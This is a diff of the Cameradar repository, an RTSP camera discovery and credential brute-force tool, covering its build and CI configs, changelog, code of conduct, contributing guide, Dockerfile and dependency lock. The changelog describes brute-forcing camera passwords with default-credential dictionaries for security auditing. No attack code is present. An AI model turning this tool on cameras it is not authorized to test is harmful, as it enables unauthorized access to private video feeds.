- CGO_ENABLED=0
|
||||
goos:
|
||||
- windows
|
||||
- darwin
|
||||
- linux
|
||||
goarch:
|
||||
- amd64
|
||||
- 386
|
||||
- arm
|
||||
- arm64
|
||||
goarm:
|
||||
- 6
|
||||
- 7
|
||||
|
||||
ignore:
|
||||
- goos: darwin
|
||||
goarch: 386
|
||||
|
||||
changelog:
|
||||
disable: true
|
||||
|
||||
checksum:
|
||||
name_template: "{{ .ProjectName }}_checksums.txt"
|
||||
|
||||
archives:
|
||||
- name_template: "{{ .Binary }}_{{ .Os }}_{{ .Arch }}{{ if .Arm}}v{{ .Arm }}{{ end }}"
|
||||
formats:
|
||||
- tar.gz
|
||||
format_overrides:
|
||||
- goos: windows
|
||||
format: zip
|
||||
|
||||
dockers:
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-amd64"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-amd64"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: amd64
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-386"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-386"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: 386
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv6"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv6"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: arm
|
||||
goarm: 6
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv7"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv7"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: arm
|
||||
goarm: 7
|
||||
- image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-arm64"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-arm64"
|
||||
dockerfile: Dockerfile
|
||||
use: buildx
|
||||
goos: linux
|
||||
goarch: arm64
|
||||
|
||||
docker_manifests:
|
||||
- name_template: "ullaakut/{{ .ProjectName }}:v{{ .Version }}"
|
||||
image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-amd64"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-386"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv6"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-armv7"
|
||||
- "ullaakut/{{ .ProjectName }}:v{{ .Version }}-arm64"
|
||||
- name_template: "ullaakut/{{ .ProjectName }}:latest"
|
||||
image_templates:
|
||||
- "ullaakut/{{ .ProjectName }}:latest-amd64"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-386"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv6"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-armv7"
|
||||
- "ullaakut/{{ .ProjectName }}:latest-arm64"
|
||||
-55
@@ -1,55 +0,0 @@
|
||||
dist: trusty
|
||||
sudo: required
|
||||
language: go
|
||||
|
||||
env:
|
||||
- DEP_VERSION="0.5.0"
|
||||
|
||||
services:
|
||||
- docker
|
||||
|
||||
before_install:
|
||||
- echo "Testing Docker Hub credentials"
|
||||
- if [[ "$DOCKER_PASSWORD" != "" ]]; then docker login -u=$DOCKER_USERNAME -p=$DOCKER_PASSWORD; fi
|
||||
- echo "Docker Hub credentials are working"
|
||||
# If I see one day that Travis CI updates their default docker version
|
||||
# I can remove the lines below. That's why I leave this here :-)
|
||||
- docker version
|
||||
- sudo apt-get remove docker docker-engine docker.io
|
||||
- curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
|
||||
- sudo apt-get update
|
||||
- sudo apt-get install -y docker-ce nmap
|
||||
- go get github.com/mattn/goveralls
|
||||
- docker version
|
||||
- curl -L -s https://github.com/golang/dep/releases/download/v${DEP_VERSION}/dep-linux-amd64 -o $GOPATH/bin/dep
|
||||
- chmod +x $GOPATH/bin/dep
|
||||
|
||||
install:
|
||||
- dep ensure
|
||||
- docker build -t cameradar .
|
||||
|
||||
script:
|
||||
# Run unit tests
|
||||
- go test -v -covermode=count -coverprofile=coverage.out
|
||||
- $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci -repotoken=$COVERALLS_TOKEN
|
||||
# Launch a fake camera to check if cameradar is able to access it
|
||||
- docker run -d --name=fake_camera -e RTSP_USERNAME=admin -e RTSP_PASSWORD=12345 -p 8554:8554 ullaakut/rtspatt
|
||||
# Launch cameradar on the local machine
|
||||
- docker run --net=host -t cameradar -t 0.0.0.0 -l > logs.txt
|
||||
- docker logs fake_camera > camera_logs.txt
|
||||
# Stop the fake camera
|
||||
- docker stop fake_camera
|
||||
# Print logs
|
||||
- cat camera_logs.txt
|
||||
- cat logs.txt
|
||||
# check if file contains more than one line
|
||||
# 1 line: Error message because no streams were found
|
||||
# More lines: Logs for all found cameras
|
||||
- if [[ $(wc -l <logs.txt) -lt 2 ]]; then exit 1; fi
|
||||
|
||||
notifications:
|
||||
email:
|
||||
recipients:
|
||||
- brendan.le-glaunec@epitech.eu
|
||||
on_success: never
|
||||
on_failure: always
|
||||
-222
@@ -1,222 +0,0 @@
|
||||
# Cameradar Changelog
|
||||
|
||||
This file lists all versions of the repository and details all changes.
|
||||
|
||||
## v2.0.0
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* Cameradar is no longer a C++ application but a Golang library
|
||||
* It is also a Golang application replacing the former C++ one (the C++ Cameradar image can still be used with the tag `1.1.4`)
|
||||
* The new docker image is much lighter (14MB vs 379MB before)
|
||||
* The Cameradar golang library enables users to build their own application around camera discovery and attack. Example of applications could be an automatic camera discovery daemon with scheduled scans, a security audit tool to check if CCTV cameras are protected from attacks by being isolated and having strong passwords, etc.
|
||||
|
||||
## v1.1.4
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Simplified use of Docker image
|
||||
* Renamed MySQL table name to be more explicit
|
||||
* Refactoring of the Golang functional tester done
|
||||
* The output was made more human readable
|
||||
* Added automatic code quality checks for pull requests
|
||||
* Added contribution documentation
|
||||
* Updated dictionaries to add user suggestions for Chinese cameras
|
||||
* Enhanced `result.json` file's format
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Fixed a bug in the functional testing in which if the `result.json` file was not formatted correctly, the test failed but was still considered a success.
|
||||
|
||||
## v1.1.3
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Added automatic pushes to DockerHub to the travis integration
|
||||
* Made travis configuration file better
|
||||
* Changed the package generation scripts to make them report errors
|
||||
* Removed old etix_rtsp_server binary from the test folder
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Fixed an issue that made it mandatory to launch tests at least once so that they can work the second time
|
||||
* Fixed an issue that made the golang testing tool not compile in the testing script
|
||||
* Fixed an issue that made the golang testing tool sometimes ignore some tests
|
||||
* The previous known issue has been investigated and we don't know where it came from. However after a night of testing I have been unable to reproduce it, so I will consider it closed
|
||||
|
||||
## v1.1.2
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Added travis integration
|
||||
* Added default environment value for Docker deployment
|
||||
* Updated docker image description with new easy usage
|
||||
* Updated README badges style (replaced flat with square-flat)
|
||||
* Build last package can now also generate a debug package if given the `Debug` command-line argument
|
||||
|
||||
#### Known issues
|
||||
|
||||
* There is still the issue with Camera Emulation Server, see the [previous version's patchnote](#v1.1.1) for more information.
|
||||
|
||||
## v1.1.1
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Removed unnecessary null pointer checks (thanks to https://github.com/elfring)
|
||||
* Updated package description
|
||||
* Removed debug message in CMake build
|
||||
* Added `/ch01.264` to the URL dictionary in the deployment (Comelit default RTSP URL)
|
||||
* Updated tests partially (still needs work to make the code cleaner)
|
||||
* Variable names are now compliant with Golang best practices
|
||||
* JSON variable names are back to normal
|
||||
* Functions have been moved in more appropriate source files
|
||||
* Structure definitions have been moved in more appropriate source files
|
||||
* Source files have been renamed to be more relevant
|
||||
* JUnit output now considers each camera as a test case
|
||||
* JUnit output now contains errors which makes debugging much easier
|
||||
* Added header files where it was forgotten
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Fixed an issue where if you lose your internet connection during thumbnail generation, FFMpeg would get stuck forever and thus Cameradar would never finish
|
||||
* Fixed an issue where multithreading could cause crashes
|
||||
* Fixed an issue where the routes dictionary was mistaken for the credentials dictionary
|
||||
* Fixed issues with the golang testing tool
|
||||
* Fixed automated camera generation
|
||||
* Fixed docker IP address resolution
|
||||
|
||||
#### Known issues:
|
||||
|
||||
* There is an issue with Camera Emulation Server that makes it impossible for Cameradar to generate thumbnails, which is why right now the verification of the thumbnails presence is commented and it is assumed correct. It is probably an issue with GST-RTSP-Server but requires investigation.
|
||||
|
||||
## v1.1.0
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* There are more command line options
|
||||
* Port can now be overridden in the command line
|
||||
* Target can now be overridden in the command line
|
||||
* Bruteforce is now multithreaded and will use as many threads as there are discovered cameras
|
||||
* Thumbnail generation is now multithreaded and will use as many threads as there are discovered cameras
|
||||
* There are now default configuration values in order to make cameradar easier to use
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* The algorithms take external input into account (so that a 3rd party can change the DB to help Cameradar in real-time) and thus check the persistent data at each iteration
|
||||
* The default log level is now DEBUG instead of INFO
|
||||
* The attack logs are now INFO instead of DEBUG
|
||||
* The thumbnail generation logs are now INFO instead of DEBUG
|
||||
|
||||
#### Bugs fixed
|
||||
|
||||
* Fixed a bug in which the MySQL cache manager would consider a camera with known ids as having a valid path even if it weren't
|
||||
* Fixed a bug in which TCP RTSP streams would not generate thumbnails
|
||||
|
||||
## v1.0.5
|
||||
|
||||
* Fixed error in MySQL Cache Manager in which thumbnail generation on valid streams could not be done
|
||||
* Fixed potential crash in the case the machine running cameradar has no memory left to allocate space for the dynamic cache manager
|
||||
|
||||
## v1.0.4
|
||||
|
||||
#### Bugs fixed:
|
||||
|
||||
* Fixed nmap package detection
|
||||
|
||||
## v1.0.3
|
||||
|
||||
#### Bugs fixed:
|
||||
|
||||
* Corrected GStreamer check
|
||||
|
||||
## v1.0.2
|
||||
|
||||
#### Bugs fixed:
|
||||
|
||||
* Fixed issues in MySQL Cache Manager
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Added useful debug logs
|
||||
|
||||
## v1.0.1
|
||||
|
||||
### Ubuntu 16.04 Release
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* The Docker deployment is now done using Ubuntu 16.04 instead of Ubuntu 15.10, so that it uses more recent packages.
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Removed useless dependencies
|
||||
|
||||
## v1.0.0
|
||||
|
||||
### First production-ready release
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* Added functional testing
|
||||
|
||||
## v0.2.2
|
||||
|
||||
After doing some testing on a weirdly configured camera network in a far away Datacenter, I discovered that some Cameras needed a few tweaks to the Cameradar attack method in order to be accessed.
|
||||
|
||||
#### Major changes:
|
||||
|
||||
* Cameradar can access Cameras that are configured to always send 400 Bad Requests responses
|
||||
|
||||
#### Minor changes:
|
||||
|
||||
* Changed iterator name from `it` to `stream` in dumb cache manager to improve code readability
|
||||
|
||||
#### Bugfixes:
|
||||
|
||||
* Cameradar no longer considers a timing out Camera as an accessible stream
|
||||
|
||||
## v0.2.1
|
||||
|
||||
This package fixes the Docker deployment package.
|
||||
|
||||
#### Minor changes
|
||||
|
||||
* Fixed the Docker deployment package
|
||||
* Updated README
|
||||
|
||||
## v0.2.0
|
||||
|
||||
### MySQL Cache Manager Release
|
||||
|
||||
This package adds a new cache manager using a MySQL database, that can store the results between multiple uses.
|
||||
|
||||
#### Major changes
|
||||
|
||||
* Added a MySQL Cache Manager
|
||||
|
||||
#### Minor changes
|
||||
|
||||
* Removed legacy code
|
||||
* Removed boost dependency
|
||||
* Improved debugging logs
|
||||
|
||||
## v0.1.1
|
||||
|
||||
### Docker release
|
||||
|
||||
This package adds a way to deploy Cameradar using Docker.
|
||||
|
||||
#### Major changes
|
||||
|
||||
* Added a quick Docker deployment process
|
||||
* Added automatic dependencies downloading through CMake for the manual installation
|
||||
* Added CPack packaging for the Docker deployment
|
||||
|
||||
#### Minor changes
|
||||
|
||||
* Changed recommended cloning method to HTTPS
|
||||
* Added lots of information to README.md
|
||||
|
||||
## v0.1.0
|
||||
|
||||
This package was the first OpenSource version of Cameradar. It contained only a simple cache manager and had some bugs.
|
||||
@@ -0,0 +1,128 @@
|
||||
# Contributor Covenant Code of Conduct
|
||||
|
||||
## Our Pledge
|
||||
|
||||
We as members, contributors, and leaders pledge to make participation in our
|
||||
community a harassment-free experience for everyone, regardless of age, body
|
||||
size, visible or invisible disability, ethnicity, sex characteristics, gender
|
||||
identity and expression, level of experience, education, socio-economic status,
|
||||
nationality, personal appearance, race, religion, or sexual identity
|
||||
and orientation.
|
||||
|
||||
We pledge to act and interact in ways that contribute to an open, welcoming,
|
||||
diverse, inclusive, and healthy community.
|
||||
|
||||
## Our Standards
|
||||
|
||||
Examples of behavior that contributes to a positive environment for our
|
||||
community include:
|
||||
|
||||
* Demonstrating empathy and kindness toward other people
|
||||
* Being respectful of differing opinions, viewpoints, and experiences
|
||||
* Giving and gracefully accepting constructive feedback
|
||||
* Accepting responsibility and apologizing to those affected by our mistakes,
|
||||
and learning from the experience
|
||||
* Focusing on what is best not just for us as individuals, but for the
|
||||
overall community
|
||||
|
||||
Examples of unacceptable behavior include:
|
||||
|
||||
* The use of sexualized language or imagery, and sexual attention or
|
||||
advances of any kind
|
||||
* Trolling, insulting or derogatory comments, and personal or political attacks
|
||||
* Public or private harassment
|
||||
* Publishing others' private information, such as a physical or email
|
||||
address, without their explicit permission
|
||||
* Other conduct which could reasonably be considered inappropriate in a
|
||||
professional setting
|
||||
|
||||
## Enforcement Responsibilities
|
||||
|
||||
Community leaders are responsible for clarifying and enforcing our standards of
|
||||
acceptable behavior and will take appropriate and fair corrective action in
|
||||
response to any behavior that they deem inappropriate, threatening, offensive,
|
||||
or harmful.
|
||||
|
||||
Community leaders have the right and responsibility to remove, edit, or reject
|
||||
comments, commits, code, wiki edits, issues, and other contributions that are
|
||||
not aligned to this Code of Conduct, and will communicate reasons for moderation
|
||||
decisions when appropriate.
|
||||
|
||||
## Scope
|
||||
|
||||
This Code of Conduct applies within all community spaces, and also applies when
|
||||
an individual is officially representing the community in public spaces.
|
||||
Examples of representing our community include using an official e-mail address,
|
||||
posting via an official social media account, or acting as an appointed
|
||||
representative at an online or offline event.
|
||||
|
||||
## Enforcement
|
||||
|
||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported to the community leaders responsible for enforcement at
|
||||
`contact+cameradar@glaulabs.com`.
|
||||
All complaints will be reviewed and investigated promptly and fairly.
|
||||
|
||||
All community leaders are obligated to respect the privacy and security of the
|
||||
reporter of any incident.
|
||||
|
||||
## Enforcement Guidelines
|
||||
|
||||
Community leaders will follow these Community Impact Guidelines in determining
|
||||
the consequences for any action they deem in violation of this Code of Conduct:
|
||||
|
||||
### 1. Correction
|
||||
|
||||
**Community Impact**: Use of inappropriate language or other behavior deemed
|
||||
unprofessional or unwelcome in the community.
|
||||
|
||||
**Consequence**: A private, written warning from community leaders, providing
|
||||
clarity around the nature of the violation and an explanation of why the
|
||||
behavior was inappropriate. A public apology may be requested.
|
||||
|
||||
### 2. Warning
|
||||
|
||||
**Community Impact**: A violation through a single incident or series
|
||||
of actions.
|
||||
|
||||
**Consequence**: A warning with consequences for continued behavior. No
|
||||
interaction with the people involved, including unsolicited interaction with
|
||||
those enforcing the Code of Conduct, for a specified period of time. This
|
||||
includes avoiding interactions in community spaces as well as external channels
|
||||
like social media. Violating these terms may lead to a temporary or
|
||||
permanent ban.
|
||||
|
||||
### 3. Temporary Ban
|
||||
|
||||
**Community Impact**: A serious violation of community standards, including
|
||||
sustained inappropriate behavior.
|
||||
|
||||
**Consequence**: A temporary ban from any sort of interaction or public
|
||||
communication with the community for a specified period of time. No public or
|
||||
private interaction with the people involved, including unsolicited interaction
|
||||
with those enforcing the Code of Conduct, is allowed during this period.
|
||||
Violating these terms may lead to a permanent ban.
|
||||
|
||||
### 4. Permanent Ban
|
||||
|
||||
**Community Impact**: Demonstrating a pattern of violation of community
|
||||
standards, including sustained inappropriate behavior, harassment of an
|
||||
individual, or aggression toward or disparagement of classes of individuals.
|
||||
|
||||
**Consequence**: A permanent ban from any sort of public interaction within
|
||||
the community.
|
||||
|
||||
## Attribution
|
||||
|
||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage],
|
||||
version 2.0, available at
|
||||
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
|
||||
|
||||
Community Impact Guidelines were inspired by [Mozilla's code of conduct
|
||||
enforcement ladder](https://github.com/mozilla/diversity).
|
||||
|
||||
[homepage]: https://www.contributor-covenant.org
|
||||
|
||||
For answers to common questions about this code of conduct, see the FAQ at
|
||||
https://www.contributor-covenant.org/faq. Translations are available at
|
||||
https://www.contributor-covenant.org/translations.
|
||||
+31
-68
@@ -1,82 +1,45 @@
|
||||
# Cameradar Contribution
|
||||
## Contributing
|
||||
|
||||
This file will give you guidelines on how to contribute if you want to, and will list known contributors to this repo.
|
||||
Thanks for helping improve Cameradar.
|
||||
Please keep changes focused and aligned with the project goals.
|
||||
|
||||
If you're not into software development or not into Golang, you can still help. Updating the dictionaries for example, would be a really cool contribution! Just make sure the credentials and routes you add are **default constructor credentials** and not custom credentials.
|
||||
## Development setup
|
||||
|
||||
If you have other cool ideas, feel free to share them with me at [brendan.leglaunec@etixgroup.com](mailto:brendan.leglaunec@etixgroup.com) or to directly [create an issue](https://github.com/Ullaakut/cameradar/issues)!
|
||||
- Go 1.25 or later
|
||||
- Docker (optional, for container testing)
|
||||
|
||||
## Version 2.0.0
|
||||
Clone the repo and install dependencies using Go modules.
|
||||
|
||||
*Cameradar* is the name of the Golang library and the binary that serves as an example of its use, as well as the docker image that runs the binary.
|
||||
```bash
|
||||
go mod download
|
||||
```
|
||||
|
||||
The 2.0.0 version was a complete refactorring of the Cameradar C++ tool, which came from the fact that most users who want to access cameras either wanted to launch it with the basic cache manager, mostly using the docker image already provided in this repository, or did not use it because it did not integrate into their software solution easily.
|
||||
## Run tests
|
||||
|
||||
Transforming it into a library allowed developers to use it directly in their own code exactly as they want, allowing for a greater flexibility. The Cameradar binary also provides a simple use example as well as maintains the old simple way of using Cameradar for non-developers.
|
||||
```bash
|
||||
make test
|
||||
```
|
||||
|
||||
## Workflow
|
||||
## Formatting and linting
|
||||
|
||||
### Branches & issues
|
||||
Run `gofmt` on changed files.
|
||||
Keep code idiomatic and consistent with existing style.
|
||||
|
||||
If you want to work on an issue, make sure you create a specific branch for this issue using the format `issue_number-solution_explanation`. Examples are:
|
||||
```bash
|
||||
make fmt
|
||||
```
|
||||
|
||||
If issue `#64` is `Improve network scan performance`, the branch to fix it should be something like: `64-improve-network-scan-performance`. Note that it should always start with a verb conjugated in the infinitive form, and describe what the commits's effects will be on the codebase. One branch should only be for one change. If your branch fixes multiple things, you're doing it wrong.
|
||||
## Reporting issues
|
||||
|
||||
Always make sure you're not working on the same issue as someone else, by asking on the issue thread to be assigned to it.
|
||||
Use the issue template in [.github/ISSUE_TEMPLATE.md](.github/ISSUE_TEMPLATE.md).
|
||||
Include the version, environment, and repro steps.
|
||||
Only scan authorized targets.
|
||||
|
||||
### Commit names
|
||||
## Pull requests
|
||||
|
||||
The name of the commits should always be #[issue number] [effect of the issue] (ex: `#343 Improve test coverage`).
|
||||
|
||||
When working on your local branch, you can do as many commits as you want, obviously. The most important is that you squash your commits before creating your pull request, or at least before it is merged.
|
||||
|
||||
In case you're not familiar with squashing, here is a simple way to do it :
|
||||
|
||||
- `git fetch origin` will make sure that you have a local version of the origin repository that is up to date (will not overwrite anything on your branch, no worries)
|
||||
- `git rebase -i origin/master` will start the process of rebasing your branch
|
||||
- This will open a file letting you decide what to do with the commits. You want to keep the first `pick` and write `s` or `squash` instead of `pick` for all other commits below.
|
||||
- If there are conflicts, you will fix them step by step by following what git tells you, it's pretty straight-forward.
|
||||
- If there are no conflicts or if they are resolved, git will let you edit the commit names. Don't forget to comment the commit names of the commits you squashed if they are not relevant by adding a # character in front of the commit message, and make sure that the commit message you left follows the aforementioned guidelines.
|
||||
- Now run `git log`, you should see only one commit by the name you chose during the rebase.
|
||||
- You can now `git push -f` if you already pused your branch on origin or simply push without the `-f` if it's your first push on origin. The reason for the `-f` is that when you squash your commits, you create a new one that will conflict with the state of your branch on origin. If you pull, it will overwrite your local state, so don't do that except if you messed up your rebase.
|
||||
|
||||
### Pull Requests
|
||||
|
||||
When your pull request is created, GitHub will first check for conflicts, Codacy will check the shell and C++ code's quality and then Travis CI will try to build and launch functional tests of your versions of Cameradar.
|
||||
|
||||
If GitHub reports conflicts with the develop branch, you should resolve them by yourself using your git command-line interface. The easiest and cleanest way is to use `git rebase -i origin/develop` and follow git's instructions.
|
||||
If Codacy reports new issues, they will be added in the comments of the PR to let you know what you should fix.
|
||||
If Travis CI reports errors, you should be able to view the logs [by clicking here](https://travis-ci.org/Ullaakut/cameradar/builds) and you should fix it. No PR will be merged before all tests are passing correctly.
|
||||
|
||||
When creating your pull request, our hooks will make sure that your code:
|
||||
|
||||
- Builds
|
||||
- Has 100% passing unit tests
|
||||
- Can actually access a camera using a functional test
|
||||
- Still has equivalent or higher test coverage (using coveralls)
|
||||
|
||||
Make sure to write in the PR description what issue it fixes. GitHub will intepret it and automatically close the issue once your pull request is closed. Just write Fixes #IssueNumber in the description.
|
||||
|
||||
When your pull request is created, GitHub will first check for conflicts and then your code will be reviewed by the maintainers of this repository.
|
||||
|
||||
If GitHub reports conflicts with the `master` branch, you should resolve them by yourself using your git command-line interface. The easiest and cleanest way is to use `git rebase -i origin/master` and follow git's instructions. If we report issues with your code, you should resolve them and then ping the person that reported them to notify them that you did the requested changes.
|
||||
|
||||
Once everything is in order, we will merge your pull request.
|
||||
|
||||
### Coding guidelines
|
||||
|
||||
Your code should just
|
||||
|
||||
- Not decrease the results of Cameradar on https://goreportcard.com/report/github.com/Ullaakut/cameradar
|
||||
- Pass the code review
|
||||
|
||||
#### Golang
|
||||
|
||||
- All Golang code has to be formated using `gofmt` or `goreturns`.
|
||||
- Make sure you follow the Golang [best practices](https://golang.org/doc/effective_go.html)
|
||||
|
||||
## Contributors
|
||||
|
||||
- **Brendan Le Glaunec** - [@Ullaakut](https://github.com/Ullaakut) - brendan.leglaunec@etixgroup.com : *Original developer & Maintainer*
|
||||
- **Jeremy Letang** - [@jeremyletang](https://github.com/jeremyletang) - letang.jeremy@gmail.com : *Idea of the project & Mentorship*
|
||||
- **ishanjain28** - [@ishanjain28](https://github.com/ishanjain28) - ishanjain28@gmail.com : *Implemented the environment variables support*
|
||||
1. Create a feature branch from `master`.
|
||||
2. Keep PRs focused and small.
|
||||
3. Update documentation when behavior changes.
|
||||
4. Add or update tests when possible.
|
||||
5. Ensure `make test` passes.
|
||||
6. Try to bring as much test coverage as possible with your changes.
|
||||
|
||||
+10
-25
@@ -1,32 +1,17 @@
|
||||
# Build stage
|
||||
FROM golang:alpine AS build-env
|
||||
|
||||
COPY . /go/src/github.com/Ullaakut/cameradar
|
||||
WORKDIR /go/src/github.com/Ullaakut/cameradar/cameradar
|
||||
|
||||
RUN apk update && \
|
||||
apk upgrade && \
|
||||
apk add nmap nmap-nselibs nmap-scripts \
|
||||
curl curl-dev \
|
||||
gcc \
|
||||
libc-dev \
|
||||
git \
|
||||
pkgconfig
|
||||
ENV DEP_VERSION="0.5.0"
|
||||
RUN curl -L -s https://github.com/golang/dep/releases/download/v${DEP_VERSION}/dep-linux-amd64 -o $GOPATH/bin/dep
|
||||
RUN chmod +x $GOPATH/bin/dep
|
||||
RUN dep ensure
|
||||
RUN go build -o cameradar
|
||||
|
||||
# Final stage
|
||||
FROM alpine
|
||||
|
||||
RUN apk --update add --no-cache nmap \
|
||||
nmap-nselibs \
|
||||
nmap-scripts \
|
||||
curl-dev
|
||||
masscan \
|
||||
libpcap \
|
||||
libpcap-dev
|
||||
|
||||
WORKDIR /app/cameradar
|
||||
COPY --from=build-env /go/src/github.com/Ullaakut/cameradar/dictionaries/ /app/dictionaries/
|
||||
COPY --from=build-env /go/src/github.com/Ullaakut/cameradar/cameradar/ /app/cameradar/
|
||||
ENTRYPOINT ["/app/cameradar/cameradar", "-r", "/app/dictionaries/routes", "-c", "/app/dictionaries/credentials.json"]
|
||||
|
||||
COPY cameradar /app/cameradar/cameradar
|
||||
|
||||
ENV CAMERADAR_CUSTOM_ROUTES="/app/dictionaries/routes"
|
||||
ENV CAMERADAR_CUSTOM_CREDENTIALS="/app/dictionaries/credentials.json"
|
||||
|
||||
ENTRYPOINT ["/app/cameradar/cameradar"]
|
||||
|
||||
Generated
-300
@@ -1,300 +0,0 @@
|
||||
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:50b257fde8ffe647a6fdb6a7fb1314711232b7ecfb891f5cd5c140c046ab89cd"
|
||||
name = "github.com/Ullaakut/nmap"
|
||||
packages = [
|
||||
".",
|
||||
"pkg/osfamilies",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "6d3f7b465d7b37c8e019c95bc1c9f6c4f93e4ee7"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:e339fa18a6e1d4dd04282f5ba77b8a09cbbf1067ba20915de87d1e65367a9c9f"
|
||||
name = "github.com/andelf/go-curl"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "9d81ad32de98e80df412c890c75d8964f696a910"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:ffe9824d294da03b391f44e1ae8281281b4afc1bdaa9588c9097785e3af10cec"
|
||||
name = "github.com/davecgh/go-spew"
|
||||
packages = ["spew"]
|
||||
pruneopts = "UT"
|
||||
revision = "8991bc29aa16c548c550c7ff78260e27b9ab7c73"
|
||||
version = "v1.1.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:865079840386857c809b72ce300be7580cb50d3d3129ce11bf9aa6ca2bc1934a"
|
||||
name = "github.com/fatih/color"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "5b77d2a35fb0ede96d138fc9a99f5c9b6aef11b4"
|
||||
version = "v1.7.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:abeb38ade3f32a92943e5be54f55ed6d6e3b6602761d74b4aab4c9dd45c18abd"
|
||||
name = "github.com/fsnotify/fsnotify"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "c2828203cd70a50dcccfb2761f8b1f8ceef9a8e9"
|
||||
version = "v1.4.7"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:842de8d5a4c8fdbbceb55ab398dd8b68a35fe7f322012cf70571baa35c333ffa"
|
||||
name = "github.com/gernest/wow"
|
||||
packages = [
|
||||
".",
|
||||
"spin",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "7e0b2a2398989a5d220eebac5742d45422ba7de8"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:e1ff887e232b2d8f4f7c7db15a5fac7be418025afc4dda53c59c765dbb5aa6b4"
|
||||
name = "github.com/go-playground/locales"
|
||||
packages = [
|
||||
".",
|
||||
"currency",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "f63010822830b6fe52288ee52d5a1151088ce039"
|
||||
version = "v0.12.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:e022cf244bcac1b6ef933f1a2e0adcf6a6dfd7b872d8d41e4d4179bb09a87cbc"
|
||||
name = "github.com/go-playground/universal-translator"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "b32fa301c9fe55953584134cb6853a13c87ec0a1"
|
||||
version = "v0.16.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c0d19ab64b32ce9fe5cf4ddceba78d5bc9807f0016db6b1183599da3dcc24d10"
|
||||
name = "github.com/hashicorp/hcl"
|
||||
packages = [
|
||||
".",
|
||||
"hcl/ast",
|
||||
"hcl/parser",
|
||||
"hcl/printer",
|
||||
"hcl/scanner",
|
||||
"hcl/strconv",
|
||||
"hcl/token",
|
||||
"json/parser",
|
||||
"json/scanner",
|
||||
"json/token",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "8cb6e5b959231cc1119e43259c4a608f9c51a241"
|
||||
version = "v1.0.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:6782ffc812e8e700e6952ede1e60487ff1fd9da489eff762985be662a7cfc431"
|
||||
name = "github.com/leodido/go-urn"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "70078a794e8ea4b497ba7c19a78cd60f90ccf0f4"
|
||||
version = "v1.1.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:2d0b44ee6208d256e29f55764db1fa41e3ae33fac6cef138acae6a79c3bd748e"
|
||||
name = "github.com/magefile/mage"
|
||||
packages = [
|
||||
"mg",
|
||||
"sh",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "aedfce64c122eef47009b7f80c9771044753215d"
|
||||
version = "v1.8.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c568d7727aa262c32bdf8a3f7db83614f7af0ed661474b24588de635c20024c7"
|
||||
name = "github.com/magiconair/properties"
|
||||
packages = ["."]
|
||||
